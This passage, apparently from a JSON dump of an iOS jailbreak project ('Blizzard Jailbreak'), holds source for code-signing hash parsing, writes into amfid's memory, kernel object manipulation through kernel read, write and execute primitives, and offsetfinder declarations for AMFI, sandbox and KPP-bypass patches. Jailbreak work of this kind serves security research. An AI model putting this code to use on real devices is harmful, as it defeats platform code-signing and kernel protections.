mach_vm_write(amfid_task_port, addr, (vm_offset_t)&val, 8);\n    if (err != KERN_SUCCESS) {\n        printf(\"AMFI TOOLS: amfid write failed (0x%llx)\\n\", addr);\n    }\n}\n\n"
  },
  {
    "path": "AMFI Utilities/amfid_tools.h",
    "content": "#import <stdio.h>\n#import <unistd.h>\n#import <sys/types.h>\n#import <mach-o/loader.h>\n#import <mach/error.h>\n#import <errno.h>\n#import <stdlib.h>\n#import <dlfcn.h>\n#import <mach/vm_map.h>\n#import <Foundation/Foundation.h>\n#import <CommonCrypto/CommonDigest.h>\n#import \"../AMFI Utilities/cs_blob.h\"\n\n\nstatic unsigned int hash_rank(const CodeDirectory *cd);\nint get_hash(const CodeDirectory* directory, uint8_t dst[CS_CDHASH_LEN]);\nint parse_superblob(uint8_t *code_dir, uint8_t dst[CS_CDHASH_LEN]);\n"
  },
  {
    "path": "AMFI Utilities/amfid_tools.m",
    "content": "#import \"amfid_tools.h\"\n#import \"amfi_utils.h\"\n#import \"amfid.h\"\n\nstatic unsigned int hash_rank(const CodeDirectory *cd){\n    uint32_t type = cd->hashType;\n    unsigned int n;\n    for (n = 0; n < sizeof(hashPriorities) / sizeof(hashPriorities[0]); ++n)\n        if (hashPriorities[n] == type){\n            return n + 1;\n        }\n    return 0;\n}\n\nint get_hash(const CodeDirectory* directory, uint8_t dst[CS_CDHASH_LEN]) {\n    uint32_t realsize = ntohl(directory->length);\n    if (ntohl(directory->magic) != CSMAGIC_CODEDIRECTORY) {\n        printf(\"AMFI TOOLS: [get_hash] wtf, not CSMAGIC_CODEDIRECTORY?!\\n\");\n        return 1;\n    }\n    uint8_t out[CS_HASH_MAX_SIZE];\n    uint8_t hash_type = directory->hashType;\n    switch (hash_type) {\n        case CS_HASHTYPE_SHA1:\n            CC_SHA1(directory, realsize, out);\n            break;\n        case CS_HASHTYPE_SHA256:\n        case CS_HASHTYPE_SHA256_TRUNCATED:\n            CC_SHA256(directory, realsize, out);\n            break;\n        case CS_HASHTYPE_SHA384:\n            CC_SHA384(directory, realsize, out);\n            break;\n        default:\n            printf(\"AMFI TOOLS:[get_hash] Unknown hash type: 0x%x\\n\", hash_type);\n            return 2;\n    }\n    memcpy(dst, out, CS_CDHASH_LEN);\n    return 0;\n}\n\nint parse_superblob(uint8_t *code_dir, uint8_t dst[CS_CDHASH_LEN]) {\n    int ret = 1;\n    const CS_SuperBlob *sb = (const CS_SuperBlob *)code_dir;\n    uint8_t highest_cd_hash_rank = 0;\n    for (int n = 0; n < ntohl(sb->count); n++){\n        const CS_BlobIndex *blobIndex = &sb->index[n];\n        uint32_t type = ntohl(blobIndex->type);\n        uint32_t offset = ntohl(blobIndex->offset);\n        if (ntohl(sb->length) < offset) {\n            printf(\"AMFI TOOLS: offset of blob #%d overflows superblob length\\n\", n);\n            return 1;\n        }\n        const CodeDirectory *subBlob = (const CodeDirectory *)(code_dir + offset);\n        if (type == 
CSSLOT_CODEDIRECTORY || (type >= CSSLOT_ALTERNATE_CODEDIRECTORIES && type < CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT)) {\n            uint8_t rank = hash_rank(subBlob);\n            if (rank > highest_cd_hash_rank) {\n                ret = get_hash(subBlob, dst);\n                highest_cd_hash_rank = rank;\n            }\n        }\n    }\n    return ret;\n}\n"
  },
  {
    "path": "AMFI Utilities/cs_blob.h",
    "content": "//from: xnu osfmk/kern/cs_blobs.h\n\n#import <mach/mach.h>\n\ntypedef struct __attribute__((packed)) {\n    uint32_t magic;                    /* magic number (CSMAGIC_CODEDIRECTORY) */\n    uint32_t length;                /* total length of CodeDirectory blob */\n    uint32_t version;                /* compatibility version */\n    uint32_t flags;                    /* setup and mode flags */\n    uint32_t hashOffset;            /* offset of hash slot element at index zero */\n    uint32_t identOffset;            /* offset of identifier string */\n    uint32_t nSpecialSlots;            /* number of special hash slots */\n    uint32_t nCodeSlots;            /* number of ordinary (code) hash slots */\n    uint32_t codeLimit;                /* limit to main image signature range */\n    uint8_t hashSize;                /* size of each hash in bytes */\n    uint8_t hashType;                /* type of hash (cdHashType* constants) */\n    uint8_t platform;                /* platform identifier; zero if not platform binary */\n    uint8_t    pageSize;                /* log2(page size in bytes); 0 => infinite */\n    uint32_t spare2;                /* unused (must be zero) */\n    \n    char end_earliest[0];\n    \n    /* Version 0x20100 */\n    uint32_t scatterOffset;            /* offset of optional scatter vector */\n    char end_withScatter[0];\n    \n    /* Version 0x20200 */\n    uint32_t teamOffset;            /* offset of optional team identifier */\n    char end_withTeam[0];\n    \n    /* Version 0x20300 */\n    uint32_t spare3;                /* unused (must be zero) */\n    uint64_t codeLimit64;            /* limit to main image signature range, 64 bits */\n    char end_withCodeLimit64[0];\n    \n    /* Version 0x20400 */\n    uint64_t execSegBase;            /* offset of executable segment */\n    uint64_t execSegLimit;            /* limit of executable segment */\n    uint64_t execSegFlags;            /* executable segment flags */\n    char 
end_withExecSeg[0];\n} CodeDirectory;\n\ntypedef struct __attribute__((packed)) {\n    uint32_t type;                    /* type of entry */\n    uint32_t offset;                /* offset of entry */\n} CS_BlobIndex;\n\ntypedef struct __attribute__((packed)) {\n    uint32_t magic;                    /* magic number */\n    uint32_t length;                /* total length of SuperBlob */\n    uint32_t count;                    /* number of index entries following */\n    CS_BlobIndex index[];            /* (count) entries */\n    /* followed by Blobs in no particular order as indicated by offsets in index */\n} CS_SuperBlob;\n\ntypedef struct __SC_Scatter {\n    uint32_t count;                    // number of pages; zero for sentinel (only)\n    uint32_t base;                    // first page number\n    uint64_t targetOffset;            // offset in target\n    uint64_t spare;                    // reserved\n} SC_Scatter;\n\n/*\n * Magic numbers used by Code Signing\n */\nenum {\n    CSMAGIC_REQUIREMENT = 0xfade0c00,        /* single Requirement blob */\n    CSMAGIC_REQUIREMENTS = 0xfade0c01,        /* Requirements vector (internal requirements) */\n    CSMAGIC_CODEDIRECTORY = 0xfade0c02,        /* CodeDirectory blob */\n    CSMAGIC_EMBEDDED_SIGNATURE = 0xfade0cc0, /* embedded form of signature data */\n    CSMAGIC_EMBEDDED_SIGNATURE_OLD = 0xfade0b02,    /* XXX */\n    CSMAGIC_EMBEDDED_ENTITLEMENTS = 0xfade7171,    /* embedded entitlements */\n    CSMAGIC_DETACHED_SIGNATURE = 0xfade0cc1, /* multi-arch collection of embedded signatures */\n    CSMAGIC_BLOBWRAPPER = 0xfade0b01,    /* CMS Signature, among other things */\n    \n    CS_SUPPORTSSCATTER = 0x20100,\n    CS_SUPPORTSTEAMID = 0x20200,\n    CS_SUPPORTSCODELIMIT64 = 0x20300,\n    CS_SUPPORTSEXECSEG = 0x20400,\n    \n    CSSLOT_CODEDIRECTORY = 0,                /* slot index for CodeDirectory */\n    CSSLOT_INFOSLOT = 1,\n    CSSLOT_REQUIREMENTS = 2,\n    CSSLOT_RESOURCEDIR = 3,\n    CSSLOT_APPLICATION = 4,\n    
CSSLOT_ENTITLEMENTS = 5,\n    \n    CSSLOT_ALTERNATE_CODEDIRECTORIES = 0x1000, /* first alternate CodeDirectory, if any */\n    CSSLOT_ALTERNATE_CODEDIRECTORY_MAX = 5,        /* max number of alternate CD slots */\n    CSSLOT_ALTERNATE_CODEDIRECTORY_LIMIT = CSSLOT_ALTERNATE_CODEDIRECTORIES + CSSLOT_ALTERNATE_CODEDIRECTORY_MAX, /* one past the last */\n    \n    CSSLOT_SIGNATURESLOT = 0x10000,            /* CMS Signature */\n    \n    CSTYPE_INDEX_REQUIREMENTS = 0x00000002,        /* compat with amfi */\n    CSTYPE_INDEX_ENTITLEMENTS = 0x00000005,        /* compat with amfi */\n    \n    CS_HASHTYPE_SHA1 = 1,\n    CS_HASHTYPE_SHA256 = 2,\n    CS_HASHTYPE_SHA256_TRUNCATED = 3,\n    CS_HASHTYPE_SHA384 = 4,\n    \n    CS_SHA1_LEN = 20,\n    CS_SHA256_LEN = 32,\n    CS_SHA256_TRUNCATED_LEN = 20,\n    \n    CS_CDHASH_LEN = 20,                        /* always - larger hashes are truncated */\n    CS_HASH_MAX_SIZE = 48, /* max size of the hash we'll support */\n    \n    /*\n     * Currently only to support Legacy VPN plugins,\n     * but intended to replace all the various platform code, dev code etc. 
bits.\n     */\n    CS_SIGNER_TYPE_UNKNOWN = 0,\n    CS_SIGNER_TYPE_LEGACYVPN = 5,\n};\n\n/*\n * Choose among different hash algorithms.\n * Higher is better, 0 => don't use at all.\n */\nstatic const uint32_t hashPriorities[] = {\n    CS_HASHTYPE_SHA1,\n    CS_HASHTYPE_SHA256_TRUNCATED,\n    CS_HASHTYPE_SHA256,\n    CS_HASHTYPE_SHA384,\n};\n\ntypedef struct __SC_GenericBlob {\n    uint32_t magic;                    /* magic number */\n    uint32_t length;                /* total length of blob */\n    char data[];\n} CS_GenericBlob;\n\n/*\n * C form of a CodeDirectory.\n */\ntypedef struct __CodeDirectory {\n    uint32_t magic;                    /* magic number (CSMAGIC_CODEDIRECTORY) */\n    uint32_t length;                /* total length of CodeDirectory blob */\n    uint32_t version;                /* compatibility version */\n    uint32_t flags;                    /* setup and mode flags */\n    uint32_t hashOffset;            /* offset of hash slot element at index zero */\n    uint32_t identOffset;            /* offset of identifier string */\n    uint32_t nSpecialSlots;            /* number of special hash slots */\n    uint32_t nCodeSlots;            /* number of ordinary (code) hash slots */\n    uint32_t codeLimit;                /* limit to main image signature range */\n    uint8_t hashSize;                /* size of each hash in bytes */\n    uint8_t hashType;                /* type of hash (cdHashType* constants) */\n    uint8_t platform;                /* platform identifier; zero if not platform binary */\n    uint8_t pageSize;                /* log2(page size in bytes); 0 => infinite */\n    uint32_t spare2;                /* unused (must be zero) */\n    \n    char end_earliest[0];\n    \n    /* Version 0x20100 */\n    uint32_t scatterOffset;            /* offset of optional scatter vector */\n    char end_withScatter[0];\n    \n    /* Version 0x20200 */\n    uint32_t teamOffset;            /* offset of optional team identifier */\n    char 
end_withTeam[0];\n    \n    /* Version 0x20300 */\n    uint32_t spare3;                /* unused (must be zero) */\n    uint64_t codeLimit64;            /* limit to main image signature range, 64 bits */\n    char end_withCodeLimit64[0];\n    \n    /* Version 0x20400 */\n    uint64_t execSegBase;            /* offset of executable segment */\n    uint64_t execSegLimit;            /* limit of executable segment */\n    uint64_t execSegFlags;            /* executable segment flags */\n    char end_withExecSeg[0];\n    \n    /* followed by dynamic content as located by offset fields above */\n} CS_CodeDirectory\n__attribute__ ((aligned(1)));\n\n\n#define CS_OPS_ENTITLEMENTS_BLOB 7    /* get entitlements blob */\nint csops(pid_t pid, unsigned int ops, void *useraddr, size_t usersize);\n\nstruct cs_blob {\n    struct cs_blob    *csb_next;\n    cpu_type_t    csb_cpu_type;\n    unsigned int    csb_flags;\n    off_t        csb_base_offset;    /* Offset of Mach-O binary in fat binary */\n    off_t        csb_start_offset;    /* Blob coverage area start, from csb_base_offset */\n    off_t        csb_end_offset;        /* Blob coverage area end, from csb_base_offset */\n    vm_size_t    csb_mem_size;\n    vm_offset_t    csb_mem_offset;\n    vm_address_t    csb_mem_kaddr;\n    unsigned char    csb_cdhash[CS_CDHASH_LEN];\n    const struct cs_hash  *csb_hashtype;\n    vm_size_t    csb_hash_pagesize;    /* each hash entry represent this many bytes in the file */\n    vm_size_t    csb_hash_pagemask;\n    vm_size_t    csb_hash_pageshift;\n    vm_size_t    csb_hash_firstlevel_pagesize;    /* First hash this many bytes, then hash the hashes together */\n    const CS_CodeDirectory *csb_cd;\n    const char     *csb_teamid;\n    const CS_GenericBlob *csb_entitlements_blob;    /* raw blob, subrange of csb_mem_kaddr */\n    void *          csb_entitlements;    /* The entitlements as an OSDictionary */\n    unsigned int    csb_signer_type;\n    \n    unsigned int    csb_reconstituted; // 
iOS 12 only\n    \n    /* The following two will be replaced by the csb_signer_type. */\n    unsigned int    csb_platform_binary:1;\n    unsigned int    csb_platform_path:1;\n    \n#if __arm64e__\n    uint64_t csb_pmap_cs_entry;\n#endif\n    \n};\n\ntypedef void (*cs_md_init)(void *ctx);\ntypedef void (*cs_md_update)(void *ctx, const void *data, size_t size);\ntypedef void (*cs_md_final)(void *hash, void *ctx);\n\nstruct cs_hash {\n    uint8_t        cs_type;    /* type code as per code signing */\n    size_t        cs_size;    /* size of effective hash (may be truncated) */\n    size_t        cs_digest_size;    /* size of native hash */\n    cs_md_init        cs_init;\n    cs_md_update     cs_update;\n    cs_md_final        cs_final;\n};\n"
  },
  {
    "path": "AMFI Utilities/osobject.c",
    "content": "#import <stdlib.h>\n#import \"../Kernel Utilities/kexecute.h\"\n#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#include \"../Exploits/sock_port/kernel_memory.h\"\n#import \"osobject.h\"\n\nstatic uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;\nstatic uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;\nstatic uint32_t off_OSDictionary_Merge              = sizeof(void*) * 0x23;\nstatic uint32_t off_OSArray_Merge                   = sizeof(void*) * 0x1E;\nstatic uint32_t off_OSArray_RemoveObject            = sizeof(void*) * 0x20;\nstatic uint32_t off_OSArray_GetObject               = sizeof(void*) * 0x22;\nstatic uint32_t off_OSObject_Release                = sizeof(void*) * 0x05;\nstatic uint32_t off_OSObject_GetRetainCount         = sizeof(void*) * 0x03;\nstatic uint32_t off_OSObject_Retain                 = sizeof(void*) * 0x04;\nstatic uint32_t off_OSString_GetLength              = sizeof(void*) * 0x11;\n\nint OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {\n    size_t len = strlen(key) + 1;\n    uint64_t ks = kalloc(len);\n    kwrite(ks, key, len);\n    uint64_t vtab = rk64(dict);\n    uint64_t f = rk64(vtab + off_OSDictionary_SetObjectWithCharP);\n    int rv = (int) kexecute(f, dict, ks, val, 0, 0, 0, 0);\n    kfree(ks, len);\n    return rv;\n}\n\nuint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {\n    size_t len = strlen(key) + 1;\n    uint64_t ks = kalloc(len);\n    kwrite(ks, key, len);\n    uint64_t vtab = rk64(dict);\n    uint64_t f = rk64(vtab + off_OSDictionary_GetObjectWithCharP);\n    int rv = (int) kexecute(f, dict, ks, 0, 0, 0, 0, 0);\n    kfree(ks, len);\n    return rv;\n}\n\nuint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {\n    uint64_t ret = _OSDictionary_GetItem(dict, key);\n    if (ret != 0) {\n        ret = ZmFixAddr(ret);\n    }\n    return ret;\n}\n\nint OSDictionary_Merge(uint64_t dict, 
uint64_t aDict) {\n    uint64_t vtab = rk64(dict);\n    uint64_t f = rk64(vtab + off_OSDictionary_Merge);\n    return (int) kexecute(f, dict, aDict, 0, 0, 0, 0, 0);\n}\n\nint OSArray_Merge(uint64_t array, uint64_t aArray) {\n    uint64_t vtab = rk64(array);\n    uint64_t f = rk64(vtab + off_OSArray_Merge);\n    return (int) kexecute(f, array, aArray, 0, 0, 0, 0, 0);\n}\n\nuint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){\n    uint64_t vtab = rk64(array);\n    uint64_t f = rk64(vtab + off_OSArray_GetObject);\n    return kexecute(f, array, idx, 0, 0, 0, 0, 0);\n}\n\nuint64_t OSArray_GetObject(uint64_t array, unsigned int idx){\n    uint64_t ret = _OSArray_GetObject(array, idx);\n    if (ret != 0){\n        ret = ZmFixAddr(ret);\n    }\n    return ret;\n}\n\nvoid OSArray_RemoveObject(uint64_t array, unsigned int idx){\n    uint64_t vtab = rk64(array);\n    uint64_t f = rk64(vtab + off_OSArray_RemoveObject);\n    (void)kexecute(f, array, idx, 0, 0, 0, 0, 0);\n}\nuint64_t _OSUnserializeXML(const char* buffer) {\n    size_t len = strlen(buffer) + 1;\n    uint64_t ks = kalloc(len);\n    kwrite(ks, buffer, len);\n    uint64_t errorptr = 0;\n    uint64_t rv = kexecute(Find_osunserializexml(), ks, errorptr, 0, 0, 0, 0, 0);\n    kfree(ks, len);\n    return rv;\n}\n\nuint64_t OSUnserializeXML(const char* buffer) {\n    uint64_t ret = _OSUnserializeXML(buffer);\n    if (ret != 0) {\n        ret = ZmFixAddr(ret);\n    }\n    return ret;\n}\n\nvoid OSObject_Release(uint64_t osobject) {\n    uint64_t vtab = rk64(osobject);\n    uint64_t f = rk64(vtab + off_OSObject_Release);\n    (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);\n}\n\nvoid OSObject_Retain(uint64_t osobject) {\n    uint64_t vtab = rk64(osobject);\n    uint64_t f = rk64(vtab + off_OSObject_Retain);\n    (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);\n}\n\nuint32_t OSObject_GetRetainCount(uint64_t osobject) {\n    uint64_t vtab = rk64(osobject);\n    uint64_t f = rk64(vtab + 
off_OSObject_GetRetainCount);\n    return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);\n}\n\nunsigned int OSString_GetLength(uint64_t osstring){\n    uint64_t vtab = rk64(osstring);\n    uint64_t f = rk64(vtab + off_OSString_GetLength);\n    return (unsigned int)kexecute(f, osstring, 0, 0, 0, 0, 0, 0);\n}\n\nchar *OSString_CopyString(uint64_t osstring){\n    unsigned int length = OSString_GetLength(osstring);\n    char *str = malloc(length + 1);\n    str[length] = 0;\n    kread(OSString_CStringPtr(osstring), str, length);\n    return str;\n}\n"
  },
  {
    "path": "AMFI Utilities/osobject.h",
    "content": "#include \"../Exploits/sock_port/kernel_memory.h\"\n\n#define OSDictionary_ItemCount(dict) rk32(dict+20)\n#define OSDictionary_ItemBuffer(dict) rk64(dict+32)\n#define OSDictionary_ItemKey(buffer, idx) rk64(buffer+16*idx)\n#define OSDictionary_ItemValue(buffer, idx) rk64(buffer+16*idx+8)\n#define OSString_CStringPtr(str) rk64(str + 0x10)\n#define OSArray_ItemCount(arr) rk32(arr+0x14)\n#define OSArray_ItemBuffer(arr) rk64(arr+32)\n\n// see osobject.c for info\n\nint OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);\nuint64_t OSDictionary_GetItem(uint64_t dict, const char *key);\nint OSDictionary_Merge(uint64_t dict, uint64_t aDict);\nvoid OSArray_RemoveObject(uint64_t array, unsigned int idx);\nuint64_t OSArray_GetObject(uint64_t array, unsigned int idx);\nint OSArray_Merge(uint64_t array, uint64_t aArray);\nuint64_t OSUnserializeXML(const char* buffer);\n\nvoid OSObject_Release(uint64_t osobject);\nvoid OSObject_Retain(uint64_t osobject);\nuint32_t OSObject_GetRetainCount(uint64_t osobject);\n\nunsigned int OSString_GetLength(uint64_t osstring);\nchar *OSString_CopyString(uint64_t osstring);\n"
  },
  {
    "path": "APFS Utilities/IOKit.h",
    "content": "//\n//  IOKit.h\n//  Blizzard Jailbreak\n//\n//  Created by GeoSn0w on 08/10/2020.\n//  Copyright © 2020 Blizzard Jailbreak. All rights reserved.\n//\n\n#ifndef IOKit_h\n#define IOKit_h\n#define IO_OBJECT_NULL (0)\n#include <CoreFoundation/CoreFoundation.h>\n\ntypedef        mach_port_t io_service_t;\ntypedef        mach_port_t io_connect_t;\ntypedef        mach_port_t    io_object_t;\ntypedef        io_object_t    io_registry_entry_t;\ntypedef char   io_name_t[128];\ntypedef char   io_struct_inband_t[4096];\nextern const   mach_port_t kIOMasterPortDefault;\n\nkern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);\nio_service_t IOServiceGetMatchingService(mach_port_t  _masterPort, CFDictionaryRef matching);\nCFMutableDictionaryRef IOServiceMatching(const char* name);\nkern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t* connect);\nio_service_t IOServiceGetMatchingService(mach_port_t  _masterPort, CFDictionaryRef  matching);\nCFMutableDictionaryRef IOServiceMatching(const char* name);\n\nkern_return_t IORegistryEntrySetCFProperties(io_registry_entry_t entry, CFTypeRef properties);\nkern_return_t IORegistryEntryGetProperty(io_registry_entry_t entry, const io_name_t propertyName, io_struct_inband_t buffer, uint32_t * size);\nio_registry_entry_t IORegistryEntryFromPath(mach_port_t port, char *path);\nkern_return_t IOObjectRelease(io_object_t object);\nkern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6);\nkern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);\nkern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);\nkern_return_t 
mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);\nkern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);\nkern_return_t mach_vm_remap(vm_map_t dst, mach_vm_address_t *dst_addr, mach_vm_size_t size, mach_vm_offset_t mask, int flags, vm_map_t src, mach_vm_address_t src_addr, boolean_t copy, vm_prot_t *cur_prot, vm_prot_t *max_prot, vm_inherit_t inherit);\n\n#endif\n/* IOKit_h */\n"
  },
  {
    "path": "APFS Utilities/liboffsetfinder64.hpp",
    "content": "//\n//  offsetfinder64.hpp\n//  offsetfinder64\n//\n//  Created by tihmstar on 10.01.18.\n//  Copyright © 2018 tihmstar. All rights reserved.\n//  This is from here: https://github.com/tihmstar/liboffsetfinder64\n//\n\n#ifndef offsetfinder64_hpp\n#define offsetfinder64_hpp\n\n#include <string>\n#include <stdint.h>\n#include <mach-o/loader.h>\n#include <mach-o/nlist.h>\n#include <mach-o/dyld_images.h>\n#include <vector>\n#include <stdlib.h>\n\ntypedef uint64_t offset_t;\nnamespace tihmstar {\n    class exception : public std::exception{\n        std::string _err;\n        int _code;\n    public:\n        exception(int code, std::string err) : _err(err), _code(code) {};\n        exception(std::string err) : _err(err), _code(0) {};\n        exception(int code) : _code(code) {};\n        const char *what(){return _err.c_str();}\n        int code(){return _code;}\n    };\n    namespace patchfinder64{\n        typedef uint8_t* loc_t;\n        \n        class patch{\n            bool _slideme;\n            void(*_slidefunc)(class patch *patch, uint64_t slide);\n        public:\n            const loc_t _location;\n            const void *_patch;\n            const size_t _patchSize;\n            patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uint64_t slide) = NULL) : _location(location), _patchSize(patchSize), _slidefunc(slidefunc){\n                _patch = malloc(_patchSize);\n                memcpy((void*)_patch, patch, _patchSize);\n                _slideme = (_slidefunc) ? 
true : false;\n            }\n            patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy._patchSize){\n                _patch = malloc(_patchSize);\n                memcpy((void*)_patch, cpy._patch, _patchSize);\n                _slidefunc = cpy._slidefunc;\n                _slideme = cpy._slideme;\n            }\n            void slide(uint64_t slide){\n                if (!_slideme)\n                    return;\n                printf(\"sliding with %p\\n\",(void*)slide);\n                _slidefunc(this,slide);\n                _slideme = false; //only slide once\n            }\n            ~patch(){\n                free((void*)_patch);\n            }\n            \n        };\n    }\n    class offsetfinder64 {\n    public:\n        struct text_t{\n            patchfinder64::loc_t map;\n            size_t size;\n            patchfinder64::loc_t base;\n            bool isExec;\n        };\n        \n    private:\n        bool _freeKernel;\n        uint8_t *_kdata;\n        size_t _ksize;\n        offset_t _kslide;\n        patchfinder64::loc_t _kernel_entry;\n        std::vector<text_t> _segments;\n        \n        struct symtab_command *__symtab;\n        void loadSegments(uint64_t slide);\n        __attribute__((always_inline)) struct symtab_command *getSymtab();\n        \n    public:\n        offsetfinder64(const char *filename);\n        offsetfinder64(void* buf, size_t size, uint64_t base);\n        const void *kdata();\n        patchfinder64::loc_t find_entry();\n        const std::vector<text_t> &segments(){return _segments;};\n        \n        patchfinder64::loc_t memmem(const void *little, size_t little_len);\n        \n        patchfinder64::loc_t find_sym(const char *sym);\n        patchfinder64::loc_t find_syscall0();\n        uint64_t             find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0);\n        \n        /*------------------------ v0rtex -------------------------- */\n      
  patchfinder64::loc_t find_zone_map();\n        patchfinder64::loc_t find_kernel_map();\n        patchfinder64::loc_t find_kernel_task();\n        patchfinder64::loc_t find_realhost();\n        patchfinder64::loc_t find_bzero();\n        patchfinder64::loc_t find_bcopy();\n        patchfinder64::loc_t find_copyout();\n        patchfinder64::loc_t find_copyin();\n        patchfinder64::loc_t find_ipc_port_alloc_special();\n        patchfinder64::loc_t find_ipc_kobject_set();\n        patchfinder64::loc_t find_ipc_port_make_send();\n        patchfinder64::loc_t find_chgproccnt();\n        patchfinder64::loc_t find_kauth_cred_ref();\n        patchfinder64::loc_t find_osserializer_serialize();\n        uint32_t             find_vtab_get_external_trap_for_index();\n        uint32_t             find_vtab_get_retain_count();\n        uint32_t             find_iouserclient_ipc();\n        uint32_t             find_ipc_space_is_task();\n        uint32_t             find_proc_ucred();\n        uint32_t             find_task_bsd_info();\n        uint32_t             find_vm_map_hdr();\n        uint32_t             find_task_itk_self();\n        uint32_t             find_task_itk_registered();\n        uint32_t             find_sizeof_task();\n        \n        patchfinder64::loc_t find_rop_add_x0_x0_0x10();\n        patchfinder64::loc_t find_rop_ldr_x0_x0_0x10();\n        \n        \n        /*------------------------ kernelpatches -------------------------- */\n        patchfinder64::patch find_i_can_has_debugger_patch_off();\n        patchfinder64::patch find_lwvm_patch_offsets();\n        patchfinder64::patch find_remount_patch_offset();\n        std::vector<patchfinder64::patch> find_nosuid_off();\n        patchfinder64::patch find_proc_enforce();\n        patchfinder64::patch find_amfi_patch_offsets();\n        patchfinder64::patch find_cs_enforcement_disable_amfi();\n        patchfinder64::patch find_amfi_substrate_patch();\n        //        patchfinder64::patch 
find_sandbox_patch();\n        patchfinder64::loc_t find_sbops();\n        patchfinder64::patch find_nonceEnabler_patch();\n        \n        \n        /*------------------------ KPP bypass -------------------------- */\n        patchfinder64::loc_t find_gPhysBase();\n        patchfinder64::loc_t find_kernel_pmap();\n        patchfinder64::loc_t find_cpacr_write();\n        patchfinder64::loc_t find_idlesleep_str_loc();\n        patchfinder64::loc_t find_deepsleep_str_loc();\n        \n        /*------------------------ Util -------------------------- */\n        patchfinder64::loc_t find_rootvnode();\n        \n        ~offsetfinder64();\n    };\n    using segment_t = std::vector<tihmstar::offsetfinder64::text_t>;\n    namespace patchfinder64{\n        \n        loc_t find_literal_ref(segment_t segemts, offset_t kslide, loc_t pos);\n    }\n}\n\n\n\n#endif /* offsetfinder64_hpp */\n"
  },
  {
    "path": "APFS Utilities/offsetfinder.cpp",
    "content": "// Based on tihmstar's liboffsetfinder64 which is open source here:\n// https://github.com/tihmstar/liboffsetfinder64\n// Also Coolstar's implementation from Electra.\n\n#include <stdint.h>\n#include <stdio.h>\n#include \"rootfs_remount.h\"\n#include \"liboffsetfinder64.hpp\"\n\nusing namespace std;\nusing namespace tihmstar;\n\nextern \"C\" uint64_t offset_vfs_context_current;\nextern \"C\" uint64_t offset_vnode_lookup;\nextern \"C\" uint64_t offset_vnode_put;\n\nextern \"C\" bool offsetizeRN(uint64_t slide){\n    printf(\"Initializing OffsetFinder...\\n\");\n    offsetfinder64 fi(\"/System/Library/Caches/com.apple.kernelcaches/kernelcache\");\n   \n    try {\n        offset_vfs_context_current = (uint64_t)fi.find_sym(\"_vfs_context_current\");\n        offset_vnode_lookup = (uint64_t)fi.find_sym(\"_vnode_lookup\");\n        offset_vnode_put = (uint64_t)fi.find_sym(\"_vnode_put\");\n        \n        printf(\"    Offsetfinder: GOT: vfs_context_current: %p\\n\", (void *)offset_vfs_context_current);\n        printf(\"    Offsetfinder: GOT: vnode_lookup: %p\\n\", (void *)offset_vnode_lookup);\n        printf(\"    Offsetfinder: GOT: vnode_put: %p\\n\", (void *)offset_vnode_put);\n        \n        offset_vfs_context_current += slide;\n        offset_vnode_lookup += slide;\n        offset_vnode_put += slide;\n        printf(\"OffsetFinder: The OffsetFinder ran successfully! Continuing...\\n\");\n        return true;\n    } catch (tihmstar::exception &e){\n        printf(\"OffsetFinder: The OffsetFinder has failed! Aborting... %d (%s)\\n\", e.code(), e.what());\n        return false;\n    } catch (std::exception &e){\n        printf(\"OffsetFinder: Could not properly initialize the OffsetFinder! %s\\n\", e.what());\n        return false;\n    }\n}\n"
  },
  {
    "path": "APFS Utilities/rootfs_remount.h",
    "content": "//\n//  rootfs_remount.h\n//  electra1131\n//\n//  Created by CoolStar on 6/7/18.\n//  Copyright © 2018 CoolStar. All rights reserved.\n//\n\n#ifndef rootfs_remount_h\n#define rootfs_remount_h\n#include <stdbool.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <copyfile.h>\n\nint file_exists(const char *filename);\n#define cp(to, from) copyfile(from, to, 0, COPYFILE_ALL)\n#ifdef __cplusplus\nextern \"C\" {\n#endif\nextern int shouldReboot;\nint remountRootFS(void);\nint unjailbreakBlizzard(void);\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* rootfs_remount_h */\n"
  },
  {
    "path": "APFS Utilities/rootfs_remount.m",
